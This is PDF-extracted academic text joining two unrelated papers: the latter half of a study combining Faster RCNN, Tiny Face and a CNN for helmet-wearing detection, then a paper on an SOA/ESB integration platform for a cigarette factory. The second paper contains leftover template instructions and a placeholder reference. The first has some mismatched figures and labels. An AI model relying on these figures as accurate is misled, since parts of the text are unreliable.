https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 The whole process can be described by the pseudocode below. Experiments In order to evaluate the performance of our framework, we use five criteria: TPR=m/n (10) FPR= l/k (11) RE =m/N (12) FNR=1−RE (13) PRE =m/(m+l) (14) where TPR is the true positive rate, FPR is the false positive rate, FNR is the false negative rate, RE is the recall rate, PRE is the precision rate, m is the correct prediction by models under the current threshold, n is the number of parts of the model detection result that are identical to the truth ground, l is the false prediction by models under the current threshold, k is the number of parts of the model detection result that are different from the truth ground, and N is the number of targets that actually exist. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 Figure 1 Faster RCNN detecting big faces. Full-size DOI: 10.7717/peerjcs.311/fig-1 To evaluate our approach, we take the publicly available benchmark data set (Safety Helmet Wearing-Dataset, ), containing images from construction sites, roads, workshops, and classrooms. The data set consists of a total of 7,581 images. We use five-fold cross validations for experiments. We randomly divide all the images into five parts. Training set, validation set, and testing set contains 3/5, 1/5, and 1/5 of the total images respectively. Preliminary analysis The detection results of Faster RCNN for faces are shown in Figs. 1 and 2. From these two figures, we can see that Faster-RCNN is suitable for detecting large objects, but not finding small ones. The detection results of Tiny Face are shown in Fig. 3. From this result, we can see that Tiny Face is good at finding small faces. To compare the differences between the two models, we used Faster RCNN and Tiny Face to test the 1000 images from the data set, and count the number of faces of different sizes detected by the two models. Figure 4 is the histogram of real data, and Fig. 5 is the histogram of face sizes detected by Faster RCNN. Taking the number of pixels (px2) as the area measurement, a face with an area smaller than 500px2 is defined as a small face, and a face larger than 500px2 is defined as a large face. Because of the large area span, the smallest face is only 90px2, while the largest face can reach 2000000px2. In order to prevent the histograms from crowding together, only faces with an area less than 2000px are shown in the figure. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 8/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-1 http://dx.doi.org/10.7717/peerj-cs.311 Figure 2 Faster RCNN detecting small faces. Full-size DOI: 10.7717/peerjcs.311/fig-2 Figure 3 Tiny Face detecting small faces. Full-size DOI: 10.7717/peerjcs.311/fig-3 Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 9/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-2 https://doi.org/10.7717/peerjcs.311/fig-3 http://dx.doi.org/10.7717/peerj-cs.311 Figure 4 Histogram of real data. Full-size DOI: 10.7717/peerjcs.311/fig-4 Figure 5 Histogram of face sizes detected by Faster RCNN. Full-size DOI: 10.7717/peerjcs.311/fig-5 According to statistics, there are actually 1,568 big faces and 83 small faces. The initial model of Faster RCNN can detect 1,468 big faces and 37 small faces. Under the assumption that the labels are correct, the false negative rate of big faces is 5.2%, and that of small faces is 55.5%. Obviously, the Faster RCNN model has lower accuracy for small faces. Then we performed statistics on Tiny Face and got the histogram of Tiny Face detection results in Fig. 6. Tiny Face can detect 1306 large faces and 44 small faces. The false negative rate for large faces is 16.8%, which is 11.6% higher than Faster RCNN, and the false negative rate for small faces is 47.0%, which is 8.5% lower than Faster RCNN. Although it is only a preliminary model, the model has not been adjusted and the amount of training has been Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 10/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-4 https://doi.org/10.7717/peerjcs.311/fig-5 http://dx.doi.org/10.7717/peerj-cs.311 Figure 6 Histogram of face sizes detected by Tiny Face. Full-size DOI: 10.7717/peerjcs.311/fig-6 adjusted to improve the accuracy of the model, but it is not difficult to see from the current data that the detection capabilities of the Faster RCNN and Tiny Face models have their own focus. When Faster RCNN detects large faces, it has a great advantage, and Tiny Face’s ability to detect small faces is better than Faster RCNN. We can find that Faster RCNN has a higher true positive rate for detecting large faces and Tiny Face has a higher true positive rate for detecting small faces. The overall effect can be better if we can combine the two methods. Accuracy of base algorithms for helmet detection Accuracy of F(I,W∗F ). In this part, we evaluate the accuracy of T(I,W ∗ T ) alone in Algo. 2. Theoretically, the more training steps the model has, the better, but in order to prevent overfitting, we still need to observe the accuracy of the model under different training steps. In the beginning, we select some images from training dataset to evaluate the model. We trained 5,000 steps and used the model to test the images of the training set, but it was obvious that the effect was not very satisfactory. Because T(I,W∗T ) is based on Faster RCNN, which has high accuracy, it is easy to miss the mark of small faces. Therefore, the quality of the model can be preliminarily judged by the number of detected targets, and then we gradually increased the number of training steps. When the number of training steps reaches 20,000 steps, the number of detected targets in the detection results of 1,000 test set images is basically maintained at about 1,300. As the number of training steps increases, the number of detected targets increases slightly. When the number reaches 60,000 steps, the number of detected targets is 1,523. At this time, precision rate of the model is 87.3%,and the recall rate is 85.9%. When the number of training steps reaches 70,000 steps, the number of detected targets is close to 1,700. At this time, the precision rate of the model is 81.2%, and the recall rate is 86.3%. We find that Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 11/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-6 http://dx.doi.org/10.7717/peerj-cs.311 Table 1 Relationship between training steps and accuracy. Steps Precision rate Recall rate 5,000 80.0% 72.4% 20,000 84.0% 82.0% 40,000 86.1% 85.1% 60,000 87.3% 85.9% 70,000 81.2% 86.3% Figure 7 ROC with respect to A Full-size DOI: 10.7717/peerjcs.311/fig-7 although the recall rate has a slight increase, but the precision rate is much lower, so we chose the model with 60,000 training steps as the final model. See Table 1 for the accuracy of F(I,W∗F ) under different training steps. Regarding to the scoring threshold, it is 0.5 by default, which means that when the score is lower than 0.5, the result will be discarded. We successively set the threshold to 0.3, 0.4, 0.5, 0.6, 0.7, and tested the validation data to choose the one that works best. Finally, we found that when the threshold is 0.6, the precision rate of the test result is 87.3%, and the recall rate is 85.9%, which is better than other thresholds. After comprehensive consideration, we finally keep 0.6 as the threshold for the ensemble. The ROC curve on the training set is shown in Fig. 7. When training this model, in order to distinguish whether an individual wearing a helmet, we use two labels: people wearing and without wearing a helmet. It makes the final trained model more accurately distinguish whether the target wears a helmet. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 12/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-7 http://dx.doi.org/10.7717/peerj-cs.311 Figure 8 ROC with respect to A_T and c_C. Full-size DOI: 10.7717/peerjcs.311/fig-8 Accuracy of T(I,W∗T ). In this part, we consider the accuracy of T(I,W ∗ T ) alone in Algo. 2. It is basically a trained Tiny Face model. We lowered the scoring threshold of Tiny Face to 0.5, requiring the Tiny Face model to be able to determine the location of the small face, and it does not need it to accurately return the scoring value. The precision rate of face detection was 85.6%, and the recall rate was 69.4%. Accuracy of C(AT,I,W∗C). In this part, we consider the accuracy of C(AT,I,W ∗ C) alone in Algo. 2. Function C(AT,I,W∗C) is basically a CNN model, which requires only one target in an image, so we select over 2,000 images from the training set, cropped the target according to the corresponding anchor labels and get 20,000 images with only one target in each image. We select 18,000 images as training data for CNN, and the other 2,000 images as a validation set to detect the accuracy of CNN, also the cropped images are divided into two sets, people wearing helmets and without wearing helmets. In addition, we rotate some images to get richer training samples. With cross-validation, we choose to use four pairs of convolution and pooling layers, of which the first layer and the size of the convolution kernel of the second convolution layer are [5,5], and the size of the convolution kernel of the third and fourth convolution layers is [3,3]. The precision rate of the final two-class CNN reached 90.3% when we use it to test the validation set of CNN. The ROC curve on the training set is shown in Fig. 8. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 13/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-8 http://dx.doi.org/10.7717/peerj-cs.311 Figure 9 ROC with respect to A_S and c_S . Full-size DOI: 10.7717/peerjcs.311/fig-9 Accuracy of Ensemble Method S(cSF,cSC,α∗). The ROC curve coverage areas of Faster CNN and AT , cC are 0.86and 0.83, respectively. The ensemble method can further improve the accuracy of the final result. Among the data, cF and cC are the results from two base methods, respectively, and the area is the size of the target frame. Obviously, cF and cC can be used as the characteristic values of the ensemble method. We test the trained model, and the area under the ROC curve coverage is larger, becoming 0.90. The ROC curve on the training set is shown in Fig. 9. Obviously, the ROC curve covered by the ensemble method has the largest coverage area, which proves that the ensemble method is effective in our model. Comparison of different algorithms. In this part, we demonstrate the effectiveness of our ensemble framework by combining Faster RCNN and Tiny Face+CNN together with ROC curve and PR curve. The ROC and PR curves are calculated from testing results through 5-fold cross-validation as Figs. 10 and 11. From Figs. 10 and 11, we can see that combination with our framework (in green) is better than single algorithms (in black and orange). Our framework can also gain the largest area under the ROC curve (0.83) in Fig. 10, and the largest area under the PR curve (0.93), namely the mAP score. It means our framework works best on average over all the possible threshold choices. Tables 2 and 3 reveals a similar phenomenon when a reasonable threshold is chosen. It indicates that, with a well-chosen threshold, our framework works better than others in terms of TPR, FPR,FNR, precision, and recall. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 14/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-9 http://dx.doi.org/10.7717/peerj-cs.311 Figure 10 Comparison with ROC. Full-size DOI: 10.7717/peerjcs.311/fig-10 Figure 11 Comparison with PR. Full-size DOI: 10.7717/peerjcs.311/fig-11 Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 15/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-10 https://doi.org/10.7717/peerjcs.311/fig-11 http://dx.doi.org/10.7717/peerj-cs.311 Table 2 Comparison with TPR, FPR, FNR. Algorithm True positive rate False positive rate False negative rate Faster RCNN 74.7% 43.1% 72.7% TinyFace + CNN 73.8% 25.8% 51.9% Faster RCNN + Tiny Face + CNN 75.6% 18.3% 42.5% Table 3 Comparison with precision and recall. Algorithm Precision Recall Faster RCNN 85.4% 27.3% Tiny Face + CNN 91.5% 48.1% Faster RCNN + Tiny Face + CNN 92.5% 57.5% Figure 12 Comparison with ROC for integrating Mobilenet and Tiny Face. Full-size DOI: 10.7717/peerjcs.311/fig-12 Our framework can also be used to integrate other complementary deep learning methods to improve their performance. As an example, we use our framework to combine Mobilenet and TinyFace+CNN, and compare the integrated results with single algorithms. The performance is shown in Figs. 12 and 13. Similar to the previous case, the algorithm performance is generally improved. Our framework also works well when a specific threshold is chosen, as shown in Tables 4 and 5. Through these experiments, we can find that the integrated framework for two complementary models can improve the performance of single algorithms by increasing Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 16/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-12 http://dx.doi.org/10.7717/peerj-cs.311 Figure 13 Comparison with PR for integrating Mobilenet and Tiny Face. Full-size DOI: 10.7717/peerjcs.311/fig-13 Table 4 Comparison with TPR, FPR, FNR for integrating Mobilenet and Tiny Face. Algorithm True positive rate False positive rate False negative rate Mobilenet 74.3% 17.4% 32.0% TinyFace + CNN 73.3% 25.2% 52.5% Mobilenet + Tiny Face + CNN 80.0% 17.2% 35.2% Table 5 Comparison with Precision and Recall for integrating Mobilenet and Tiny Face. Algorithm Precision Recall Mobilenet 92.0% 69.4% Tiny Face + CNN 91.9% 47.7% Mobilenet + Tiny Face + CNN 94.7% 77.7% the true positive rate, the precision rate, and the recall rate, while reducing the false positive rate and false negative rate. DISCUSSION The detection accuracy of a single model is usually not a satisfactory, so we use an ensemble method to integrate models to get better results. Considering complementary behaviors of different algorithms, using an ensemble method for integration can effectively improve the accuracy of the detection results. For example, through our experiments, we can use Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 17/21 https://peerj.com https://doi.org/10.7717/peerjcs.311/fig-13 http://dx.doi.org/10.7717/peerj-cs.311 Tiny Face model with CNN to overcome the shortcomings that the Faster RCNN model possesses when detecting small faces. Although the proportion of small faces in the test set of this experiment is not very large, the missing rate is still one percent lower than that of a single model. In the test set with a large proportion of small faces, the detection accuracy of the integrated model can be improved further. CONCLUSION When the detection accuracy of a single deep learning model could not meet the demand for helmet-wearing detection, we can integrate a complementary model with it to get better results. In addition, our framework can make single algorithms more robust to data sets from different scenarios, because it can utilize the advantage of the complementary algorithms. By analyzing a variety of object detection models, we find that many models are difficult to achieve high-precision for helmet-wearing detection in different scenarios. Therefore, we carefully select two complementary base models and add additional modules to make them suitable for helmet-wearing detection. We ensemble the base models and build a more powerful helmet-wearing detection algorithm to further improve the detection capability. Our approach can be accelerated by GPU and be deployed on distributed computers to reduce processing time, and thus, can be useful in real-world scenarios. In the future, the model can also be extended by integrating additional features or models and upgraded to mixed neural network models. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the National Natural Science Foundation of China (NO. 61802372), the Natural Science Foundation of Zhejiang Province (NO. LGG20F020011), the Ningbo Science and Technology Innovation Project (NO. 2018B10080), and the Qianjiang Talent Plan (NO. QJD1702031). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Natural Science Foundation of China: 61802372. Natural Science Foundation of Zhejiang Province: LGG20F020011. Ningbo Science and Technology Innovation Project: 2018B10080. Qianjiang Talent Plan: QJD1702031. Competing Interests The authors declare there are no competing interests. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 18/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311 Author Contributions • Zheming Fan and Chengbin Peng conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Licun Dai conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • Feng Cao, Jianyu Qi and Wenyi Hua performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Code is available as a Supplemental File. The data set is available at GitHub: https://github.com/njvisionpower/Safety-Helmet- Wearing-Dataset. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.311#supplemental-information. REFERENCES Anonymous. 2020. Safety helmet wearing-dataset. Available at https://github.com/ njvisionpower/Safety-Helmet-Wearing-Dataset (accessed on 3 August 2020). Bo Y, Huan Q, Huan X, Rong Z, Hongbin L, Kebin M, Weizhong Z, Lei Z. 2019. Helmet detection under the power construction scene based on image analysis. In: 2019 IEEE 7th international conference on computer science and network technology (ICCSNT). Piscataway: IEEE, 67–71. Choudhury T, Aggarwal A, Tomar R. 2020. A deep learning approach to helmet detection for road safety. Journal of Scientific and Industrial Research 79(06):509–512. Donahue J, Jia Y, Vinyals O, Hoffman J, Zhang N, Tzeng E, Darrell T. 2013. A deep convolutional activation feature for generic visual recognition. Berkeley: UC Berkeley & ICSI. Feng X, Jiang Y, Yang X, Du M, Li X. 2019. Computer vision algorithms and hardware implementations: a survey. Integration 69:309–320 DOI 10.1016/j.vlsi.2019.07.005. Freund Y, Schapire RE. 1997. A decision-theoretic generalization of on-line learning and an application to boosting. Journal of Computer and System Sciences 55(1):119–139 DOI 10.1006/jcss.1997.1504. Fukushima K, Miyake S. 1982. Neocognitron: a self-organizing neural network model for a mechanism of visual pattern recognition. In: Competition and cooperation in neural nets. Berlin, Heidelberg: Springer, 267–285. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 19/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.311#supplemental-information https://github.com/njvisionpower/Safety-Helmet-Wearing-Dataset https://github.com/njvisionpower/Safety-Helmet-Wearing-Dataset http://dx.doi.org/10.7717/peerj-cs.311#supplemental-information http://dx.doi.org/10.7717/peerj-cs.311#supplemental-information https://github.com/njvisionpower/Safety-Helmet-Wearing-Dataset https://github.com/njvisionpower/Safety-Helmet-Wearing-Dataset http://dx.doi.org/10.1016/j.vlsi.2019.07.005 http://dx.doi.org/10.1006/jcss.1997.1504 http://dx.doi.org/10.7717/peerj-cs.311 Garcia-Garcia A, Orts-Escolano S, Oprea S, Villena-Martinez V, Garcia-Rodriguez J. 2017. A review on deep learning techniques applied to semantic segmentation. ArXiv preprint. arXiv:1704.06857. Girshick R. 2015. Fast r-cnn. In: Proceedings of the IEEE international conference on computer vision. Piscataway: IEEE, 1440–1448. Girshick R, Donahue J, Darrell T, Malik J. 2014. Rich feature hierarchies for accurate object detection and semantic segmentation. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 580–587. Hu P, Ramanan D. 2017. Finding tiny faces. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 951–959. Krizhevsky A, Sutskever I, Hinton GE. 2017. Imagenet classification with deep convolu- tional neural networks. Communications of the ACM 60(6):84–90. LeCun Y, Bottou L, Bengio Y, Haffner P. 1998. Gradient-based learning applied to docu- ment recognition. Proceedings of the IEEE 86(11):2278–2324 DOI 10.1109/5.726791. Li K, Zhao X, Bian J, Tan M. 2017a. Automatic safety helmet wearing detection. In: 2017 IEEE 7th annual international conference on CYBER technology in automation, control, and intelligent systems (CYBER). Piscataway: IEEE, 617–622. Li J, Liu H, Wang T, Jiang M, Wang S, Li K, Zhao X. 2017b. Safety helmet wearing detec- tion based on image processing and machine learning. In: 2017 Ninth International Conference on Advanced Computational Intelligence (ICACI). Piscataway: IEEE, 201–205. Liu BC, Ivers R, Norton R, Boufous S, Blows S, Lo SK. 2008. Helmets for preventing injury in motorcycle riders. Cochrane Database of Systematic Reviews 1:CD004333 DOI 10.1002/14651858.CD004333.pub3. Liu XH, Ye XN. 2014. Skin color detection and hu moments in helmet recognition research. Journal of East China University of Science and Technology 3:365–370. Long X, Cui W, Zheng Z. 2019. Safety helmet wearing detection based on deep learning. In: 2019 IEEE 3rd information technology, networking, electronic and automation control conference (ITNEC). Piscataway: IEEE, 2495–2499. Redmon J, Divvala S, Girshick R, Farhadi A. 2016. You only look once: unified, real- time object detection. In: Proceedings of the IEEE conference on computer vision and pattern recognition. Piscataway: IEEE, 779–788. Ren S, He K, Girshick R, Sun J. 2015. Faster r-cnn: towards real-time object detection with region proposal networks. In: Advances in neural information processing systems. 91–99. Rubaiyat AH, Toma TT, Kalantari-Khandani M, Rahman SA, Chen L, Ye Y, Pan CS. 2016. Automatic detection of helmet uses for construction safety. In: 2016 IEEE/WIC/ACM International Conference on Web Intelligence Workshops (WIW). Piscataway: IEEE, 135–142. Schapire RE. 1990. The strength of weak learnability. Machine Learning 5(2):197–227. Shi H, Chen X, Yang Y. 2019. Safety helmet wearing detection method of improved YOLOv3. Computer Engineering and Applications 55:213–220 DOI 10.3778/j.issn.1002-8331.1811-0389. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 20/21 https://peerj.com http://arXiv.org/abs/1704.06857 http://dx.doi.org/10.1109/5.726791 http://dx.doi.org/10.1002/14651858.CD004333.pub3 http://dx.doi.org/10.3778/j.issn.1002-8331.1811-0389 http://dx.doi.org/10.7717/peerj-cs.311 Siebert FW, Lin H. 2020. Detecting motorcycle helmet use with deep learning. Accident Analysis & Prevention 134:105319 DOI 10.1016/j.aap.2019.105319. Thompson DC, Rivara F, Thompson R. 1999. Helmets for preventing head and facial injuries in bicyclists. Cochrane Database of Systematic Reviews 1992(2):CD001855 DOI 10.1002/14651858.CD001855. World Health Organization. 2006. Helmets: a road safety manual for decision-makers and practitioners. Geneva: World Health Organization. Yunbo LIU, Huang H. 2015. Research on monitoring of workers’ helmet wearing at the construction site. Electronic Science and Technology 28(4):69–72. Fan et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.311 21/21 https://peerj.com http://dx.doi.org/10.1016/j.aap.2019.105319 http://dx.doi.org/10.1002/14651858.CD001855 http://dx.doi.org/10.7717/peerj-cs.311 work_35tjy7sldnhtrdrp4eqtj2nuw4 ---- Paper Title (use style: paper title) International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 DOI: 10.21307/ijanmc-2020-003 15 Research on Enterprise Application Integration Platform Based on SOA Architecture Liu Pingping School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China E-mail: 1341369601@qq.com Lu Jiaxing School of Computer Science and Engineering Xi’an Technological University Xi’an, 710021, China E-mail: 1721653661@qq.com Abstract—Tobacco industry is a relatively early industry in China' information industry, so there are many problems, such as the lack of overall planning, the wide application system, but the low degree of integration of information resources, and the serious problem of "information island". In order to solve how to establish an efficient and flexible way of information interaction within the enterprise, an enterprise application integration platform based on SOA architecture is proposed. The platform takes ESB as the core, transforms enterprise information integration into a new way conforming to SOA architecture, and establishes the idea of basic data management, so as to achieve the purpose of optimizing the overall information resources of the enterprise Keywords-SOA Framework; Information Interaction; ESB; Information Integration I. INTRODUCTION SOA is widely used in the IT industry in the 21st century. SOA is service oriented architecture, Service oriented architecture. It is architecture, not a technology or a method. We can also say that SOA is an idea. In China, many enterprises begin to build enterprise integration platform based on SOA. For example, Kingdee Apusic SOA. Fmqm exotica, developed by Almaden Laboratory of IBM company, is a distributed workflow management system based on persistent message queue, which can save the execution information of workflow through persistent message queue and complete the complete independence of all nodes in the execution process SOA architecture has three significant advantages: loose coupling, coarse granularity, and location protocol transparency. Through the encapsulation of services to achieve a comprehensive loose coupling, loose coupling can reduce the dependency between services, so that the flexibility of the service itself can be improved, and it will not be forced to adjust because of other services adjustment, thus greatly improving the reusability of services. Coarse granularity means that the interface of services defined in SOA is close to the actual user operation. Location protocol transparency means that when accessing the service defined by SOA, you do not need to know the specific location and transport protocol of the service. Even if the location and transport protocol of the service change, the client that invokes the service does not need to change. Based on the investigation and analysis of the problems of information island, high coupling degree and poor integration expansibility of each system in BJ cigarette factory based on SOA architecture, an enterprise application integration platform design scheme suitable for the actual situation of the enterprise is proposed to solve the current problems. Therefore, through the research on the practical application of the enterprise application integration platform based on SOA architecture in cigarette enterprises, through the research on SOA architecture and ESB technology, combined with the analysis of the actual problems of information integration in cigarette manufacturing enterprises, this paper puts forward the design scheme of the enterprise application integration platform that adapts to the actual situation of enterprises. II. THE CURRENT SITUATION Tobacco industry is an industry with an early start of information construction in China. At present, the level of information is generally high. BJ cigarette factory, as the main cigarette manufacturing enterprise in Shaanxi Province, has many application systems after years of information construction, covering all aspects of the factory from production to management. The main information systems include manufacturing execution (MES) system and enterprise Industrial International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 16 resource planning (ERP) system, logistics system, data acquisition system in the car room, centralized control system in the silk making workshop, power and energy management system, human resource management system, enterprise card system, etc. The more application systems there are, the problem is not only the disunity of basic data, but also the complexity of system integration. The traditional integration method generally adopts the point-to-point mode. Each system needs a special channel to integrate Chengdu. As shown in Figure 1, the integration of N application systems will generate N * (n-1) integration channels with high complexity. When new application systems need to be integrated, the complexity improvement will also be exponential. Figure 1. Integration complexity In summary, the current informatization problems of BJ cigarette factory mainly include the following aspects: 1) There are some isolated information islands and some application systems are in information closed state due to lack of external integration means. 2) The basic data in the enterprise is scattered in different application systems, which need to be maintained separately, so it is difficult to ensure the unity of the basic data of the whole enterprise, so as to "count out one place". The lack of a unified basic data code system makes information interaction difficult. 3) Basic data depends on business system and has high coupling. At present, the basic data in the enterprise mainly depends on ERP system, and the purpose of the basic data is to provide the most basic data information for all application systems of the whole enterprise, so relying on a single application system will cause unnecessary impact on the users of other basic data. 4) Poor integration scalability. At present, the information system of the whole enterprise adopts the point-to-point integration mode. If the new application system wants to join the integration system, it needs the cooperation of each application system. The upgrading or transformation of the existing application system also needs to involve a lot of external interface changes, because of this poor scalability. 5) The lack of management and monitoring of data interaction process makes it difficult to find and deal with problems in the process of data interaction in time. Some data have high requirements for timeliness. If it can not be communicated in time, it will have a significant impact on the actual business. Therefore, effective management and monitoring measures are needed for the data interaction process. 6) The integration of point-to-point results in the aggravation of network burden, and many data interaction contents are repeated, but the data can not be reused, resulting in the waste of resources. Through the analysis and optimization of the current problems of the enterprise, the core of which is to establish a reasonable and efficient way of information integration. In recent years, with the continuous development of information integration technology and the formulation of a series of standards and specifications, a new solution is gradually being paid attention to, which is based on service oriented architecture the enterprise application integration (EAI) of Architecture (SOA) regards each application system in the enterprise as the service unit of SOA architecture, and establishes the enterprise application integration platform to realize the information integration between each application system. In this enterprise application integration platform, an enterprise service bus (ESB) is needed to provide standardized services. Enterprise service bus is the service operation support platform in SOA architecture, and the services encapsulated by other application systems run on this service bus, as shown in Figure 2, its establishment can effectively optimize the current enterprise ' s disordered and meshed integration mode. Secondly, we need to establish a data exchange management platform to manage all services running in the enterprise service bus and monitor the data interaction process in the integration. Finally, we need to establish a basic data management platform, as a service provider in the SOA architecture, to provide basic data management functions for other application systems. The basic data International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 17 management platform will integrate the basic data of other application systems and manage them uniformly. Other systems do not need to be managed separately. Figure 2. Schematic diagram of optimized enterprise integration channel III. DESIGN AND IMPLEMENTATION Because IBM WMB is used as the enterprise service bus, IBM DB2 will be used as the database and IBM was (WebSphere Application Server) will be used as the application server for better overall stability. According to the demand analysis, the data exchange platform as the enterprise service bus will provide a unified entry service WS? MB. After other application systems call the service, the ESB will parse and route the called messages, and find the corresponding registered business processing WebService to call. The data exchange management platform is responsible for the management and monitoring of IBM WMB enterprise service bus. In the data exchange management platform, it is necessary to register, modify, disable, reuse and other management functions for the service processing business. At the same time, the data exchange management platform should also realize the log recording of data sending, so as to complete the monitoring of data exchange process. Figure 3. Technical framework of the platform IV. DESIGN OF ENTERPRISE SERVICE BUS DATE EXCHANGE PLATFORM As the core module of enterprise application integration platform, data exchange platform needs to undertake the important work of message transmission. As shown in Figure 4, it is a basic data exchange process. The data exchange platform publishes a unified entry service WS? MB through the web service. The service caller calls the service first, and sends the call request to the data exchange platform in the form of XML message. The data exchange platform will analyze the message content, find the actual service to call, and send the message to the actual, the actual service provider will return the processed results to the data exchange platform in the form of XML message, and then the data exchange platform will return to the original caller. Figure 4. Flow chart of data exchange International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 18 Finally, complete content and organizational editing before formatting. Please take note of the following items when proofreading spelling and grammar: A. Abbreviations and Acronyms Define abbreviations and acronyms the first time they are used in the text, even after they have been defined in the abstract. Abbreviations such as IEEE, SI, MKS, CGS, sc, dc, and rms do not have to be defined. Do not use abbreviations in the title or heads unless they are unavoidable the request message sent by the service caller should contain complete routing information, so how to define the routing information? In fact, from the process of data exchange, it can be seen that the three elements of data sender, data receiver and the service to be called can constitute a unique data process, so the routing information should also contain three elements. Unified format definition of service call request XML message: < ID > < ID > / / message ID or serial number < name > < name > / / message description < source > < source > / / data source < target > < target > / / data destination < sername > < / sername > / / call service ID < msgtype > < / msgtype > / / type of message (0: normal 1: request 2: answer) < rtcode > < / rtcode > / / the return value of the corresponding request (1: success 0: failure) < rtdesc > < / rtdesc > / / return description of the corresponding request < backup1 > < backup1 > / / standby information < date > XXXX / XX / XX XX: XX: XX < / date > / / message sending time

< / Table > / / the main body of the data sent. Table represents a data table. Row is the specific data. Table can be nested in table to represent the data of the main sub table structure. In the XML definition, the head part describes the basic information of the data, and the three attributes of source, target and sername are the most important routing information. Through these three attributes, you can uniquely determine the service that the data needs to call, that is, the user of the service, the provider of the service and the name of the service. These attributes are registered by the service management module and are in the unified portal after receiving the XML data, the service calls the corresponding service according to the three attributes and the service registration information in the management module to send the data. V. IMPLEMENTATION The main functions of data exchange management platform are service management and data exchange process monitoring. As shown in Figure 5, it is the main interface of the data exchange management platform. The frequency of data exchange can be calculated through the log, and the reception and transmission volume of each system and data accessing the platform can be displayed intuitively. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 19 Figure 5. Main interface of data exchange management platform a) The function of service governance is realized by registering and managing the web service published by each application system. As shown in Figure 6, the contents to be registered include: sequence number, system name, interface name, enabling tag, source, target, interface service name and WebServiceURL, namespace, calling method input object, input parameter name, output parameter name, calling method output object, extended input parameter, extended input parameter value, authentication information, WebService technology, remarks, etc. (due to confidentiality reasons, the figure is not complete). b) Figure 7 is the implementation interface of the authority management function of the management platform for basic data. The maintenance of basic data is usually carried out by the personnel in charge of specific business. Different business personnel are usually responsible for different data. The authority management module can configure the addition, modification, deletion and query authority of various basic data according to different roles, and can also configure whether specific attributes are visible The RBAC mode is implemented. Figure 6. Data operation module International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 20 First, configure different roles in role management, then configure the permissions of roles through role and function relationship, and finally configure the roles of different users through role and user relationship or user and role relationship. A user can have multiple roles, and a role can be played by multiple users at the same time. Figure 8 is the implementation of the data synchronization module of the basic data management platform. By customizing the interface content and configuring different sending interfaces for different systems, you can configure whether the attribute column of the basic data is sent, the name of the sent column, etc., and you can also filter and group the sent content through SQL statements. Figure 7. Authority management Figure 8. Definition of interface service Other application systems publish and register the service of receiving basic data in the data exchange management platform. After the basic data management platform configures the interface, when the new basic data maintenance is completed, the platform will automatically send the data to the corresponding system through the data exchange platform according to the interface configuration. All application systems adopt this mode, and the basic data is unified. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.01, 2020 21 VI. CONCLUSION In this paper, through understanding the application status of SOA architecture in BJ cigarette enterprise, the enterprise integrated information system based on SOA architecture is proposed to solve the problems of the enterprise's current information island, high coupling between various systems, and poor integration and expansion. The basic data management platform manages and synchronizes the basic data of the whole enterprise in a centralized way, so as to solve the integration problem of application systems caused by the data inconsistency. REFERENCES [1] Li Zi, Yang Bin. Application of Enterprise Service Bus Technology (ESB) in large enterprises [J]. Information technology, 2013, 2:146- 147. [2] Lu Hongwei. Enterprise application integration solution based on SOA and ESB [J]. Computer application and software, 2010, 4:215- 216. [3] Chen Lingping. Design and implementation of unified application service interface platform based on SOA [J]. Network security technology and application, 2009, 4:89K. Elissa, “Title of paper if known,” unpublished. [4] Jin Baohua, he Zhenyuan, Zhang Liang, et al. Analysis and design of data sharing and exchange platform based on SOA [J]. Journal of Zhengzhou Institute of light industry (NATURAL SCIENCE EDITION), 2011, 2:102-103. [5] Du Wanya. Design and implementation of SOA framework based on ESB [D]. Beijing: Beijing 